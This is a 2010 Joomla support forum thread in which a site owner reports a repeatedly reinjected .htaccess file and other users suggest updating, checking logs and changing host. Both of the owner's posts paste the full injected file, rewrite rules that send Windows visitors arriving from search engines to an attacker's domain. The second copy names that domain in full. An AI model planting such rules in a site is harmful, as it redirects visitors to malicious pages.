Htaccess being re-written yet with permission set to 644

mwongzie
Joomla! Intern
Posts: 50
Joined: Tue Nov 20, 2007 5:20 am
Location: NC Raleigh

Htaccess being re-written yet with permission set to 644

Post by mwongzie » Mon May 17, 2010 12:28 pm

I have a site running Version 1.5.14, and my htaccess file is being re-written by some script, I assume, with the latest being something like

Code:

#
# DO NOT EDIT THIS FILE!
#
ErrorDocument 500 http://ns2.{mod deleted}/main.php?i=JcitjdAYrPKmjBjyXsVBypEZ&e=0
ErrorDocument 502 http://ns2.{mod deleted}/main.php?i=JcitjdAYrPKmjBjyXsVBypEZ&e=2
ErrorDocument 403 http://ns2.{mod deleted}/main.php?i=JcitjdAYrPKmjBjyXsVBypEZ&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.{mod deleted}/main.php?e=r&h=%{HTTP_HOST}&i=JcitjdAYrPKmjBjyXsVBypEZ [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns2.{mod deleted}/main.php?e=4&h=%{HTTP_HOST}&i=JcitjdAYrPKmjBjyXsVBypEZ [R,L]

I have checked throughout the forum and I cannot seem to get anyone with an answer. Any help?
Last edited by mandville on Mon May 17, 2010 1:51 pm, edited 1 time in total.
Reason: break link to prevent spam juice
Mark Mwongela
Manager and Web Developer
Verviant Consulting Services
Web, Software and Mobile Development
Joomla, Wordpress, .NET , PHP, Iphone, Blackberry Development
http://www.verviant.com , http://www.verviant.com/portfolio

Per Yngve Berg
Joomla! Master
Posts: 25770
Joined: Mon Oct 27, 2008 9:27 pm
Location: Akershus, Norway

Re: Htaccess being re-written yet with permission set to 644

Post by Per Yngve Berg » Mon May 17, 2010 1:47 pm

Have you talked to your host provider? Maybe they are distributing the file.

mandville
Joomla! Master
Posts: 14781
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Htaccess being re-written yet with permission set to 644

Post by mandville » Mon May 17, 2010 1:52 pm

Is this just a part of your htaccess file or all of it?
Did you check the change log and see when it happened and then the raw logs to see who/how it was modified?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

fw116
Joomla! Ace
Posts: 1365
Joined: Tue Sep 06, 2005 11:18 am
Location: Germany

Re: Htaccess being re-written yet with permission set to 644

Post by fw116 » Mon May 17, 2010 3:27 pm

mwongzie wrote:
> I have a site running Version 1.5.14, and my htaccess file is being re-written by some script, I assume, with the latest being something like
> I have checked throughout the forum and I cannot seem to get anyone with an answer. Any help?

Well,
because of the (in bold) version number, I think you've been cracked...

so delete everything, grab a backup and install it, UPDATE and u are done...

Skiprr
Joomla! Fledgling
Posts: 3
Joined: Thu May 20, 2010 3:22 pm

Re: Htaccess being re-written yet with permission set to 644

Post by Skiprr » Thu May 20, 2010 4:35 pm

fw116 wrote:
> mwongzie wrote:
>> I have a site running Version 1.5.14, and my htaccess file is being re-written by some script, I assume, with the latest being something like
>> I have checked throughout the forum and I cannot seem to get anyone with an answer. Any help?
>
> Well,
> because of the (in bold) version number, I think you've been cracked...
>
> so delete everything, grab a backup and install it, UPDATE and u are done...

Just a note that staying up-to-date with the current version of Joomla is an important security element, but it is by far not the only precaution needed. Changing the Joomla core will seldom make up for poorly-written add-ons, a weakly configured server structure, old or poorly-configured PHP versions, inadequately protected SQL tables, having critical files like Joomla's configuration.php in Web-readable directories, JavaScript or Perl that is vulnerable to XSS attacks, etc.

I'm just chiming in so that folks realize there is more work to do than making sure the current version of Joomla is running.

maryjones5
Joomla! Fledgling
Posts: 1
Joined: Thu May 20, 2010 11:33 pm

Re: Htaccess being re-written yet with permission set to 644

Post by maryjones5 » Thu May 20, 2010 11:35 pm

I'm having this same issue
Last edited by mandville on Thu May 20, 2010 11:50 pm, edited 1 time in total.
Reason: signature against forum rules http://forum.joomla.org/viewtopic.php?f=8&t=65

MikeHell
Joomla! Apprentice
Posts: 43
Joined: Tue Mar 13, 2007 12:52 am

Re: Htaccess being re-written yet with permission set to 644

Post by MikeHell » Sat May 22, 2010 4:09 pm

Please have a look at this for more info on these latest Htaccess attacks:
http://blog.unmaskparasites.com/2010/05 ... new-trend/

For anyone currently hosted on Godaddy [ or Network Solutions ] you seriously need to find a new host as fast as you can:
http://smackdown.blogsblogsblogs.com/20 ... -decision/

mandville
Joomla! Master
Posts: 14781
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Htaccess being re-written yet with permission set to 644

Post by mandville » Sat May 22, 2010 5:31 pm


mwongzie
Joomla! Intern
Posts: 50
Joined: Tue Nov 20, 2007 5:20 am
Location: NC Raleigh

Re: Htaccess being re-written yet with permission set to 644

Post by mwongzie » Wed May 26, 2010 3:53 pm

Now this is even more intriguing. The hacker (in this case assuming it's not a script or virus that infected my server) has managed to write an .htaccess file in the root (before public_html folder) with the following code. I have upgraded everything, I just hadn't changed my FTP passwords (which I have now). The .htaccess file had

Code:

ErrorDocument 500 http://ww.vailconstruction.net/main.php?i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=0
ErrorDocument 502 http://ww.vailconstruction.net/main.php?i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=2
ErrorDocument 403 http://ww.vailconstruction.net/main.php?i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ww.vailconstruction.net/main.php?h=%{HTTP_HOST}&i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=r [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ww.vailconstruction.net/main.php?h=%{HTTP_HOST}&i=Jc6pjtEVqv2ngRj9XsJByZEZ&e=4 [R,L]

I have backed up, upgraded and restored, now keenly watching for anything funny. If anyone hears anything worth sharing, please do.

Thanks